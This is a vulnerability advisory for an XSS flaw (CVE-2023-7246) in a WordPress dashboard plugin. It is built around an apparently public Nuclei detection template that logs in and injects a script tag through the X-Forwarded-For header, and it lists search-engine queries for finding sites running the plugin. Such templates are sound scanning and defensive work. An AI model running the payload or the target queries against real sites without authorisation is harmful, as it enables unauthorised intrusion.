CVE-2023-7246: System Dashboard < 2.8.10 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: System Dashboard | POC: 已公开

漏洞描述

The System Dashboard WordPress plugin before 2.8.10 does not sanitize and escape some parameters, which could allow administrators in multisite WordPress configurations to perform Cross-Site Scripting attacks through header injection, specifically in the X-Forwarded-For header.

PoC代码[已公开]

id: CVE-2023-7246

info:
  name: System Dashboard < 2.8.10 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The System Dashboard WordPress plugin before 2.8.10 does not sanitize and escape some parameters, which could allow administrators in multisite WordPress configurations to perform Cross-Site Scripting attacks through header injection, specifically in the X-Forwarded-For header.
  remediation: |
    Update the System Dashboard plugin to version 2.8.10 or later.
  reference:
    - https://wpscan.com/vulnerability/7413d5ec-10a7-4cb8-ac1c-4ef554751518/
    - https://research.cleantalk.org/cve-2023-7246/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-7246
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-7246
    cwe-id: CWE-79
    epss-score: 0.01714
    epss-percentile: 0.81686
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="wp-content/plugins/system-dashboard/"
    google-query: inurl:"/wp-content/plugins/system-dashboard/"
    shodan-query: html:"wp-content/plugins/system-dashboard/"
  tags: cve,cve2023,wp,wordpress,xss,wp-plugin,authenticated,system-dashboard

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/index.php?page=system-dashboard HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 0.0.0.0<script>alert(document.domain)</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Your IP</strong>"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022036f31b300bc3c3653f884ddca5772f4b49e8424fa591007ac5d589484ef9247f02201695168f51fe385b131c7c722cee38b0164cd889836a916d530ae62b087c3d51:922c64590222798bb761d5b6d8e72950